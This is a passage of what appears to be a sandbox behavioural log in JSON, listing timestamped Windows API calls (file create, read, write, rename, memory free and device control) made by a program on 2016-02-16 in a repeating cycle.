"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,940", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,980", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:47,010", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,010", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,020", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,030", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,030", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:47,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,060", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:47,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:47,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:47,170", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,180", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,190", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,190", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,200", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,200", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,210", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,220", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,220", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:47,230", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,240", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,250", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,250", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:47,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,260", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", 
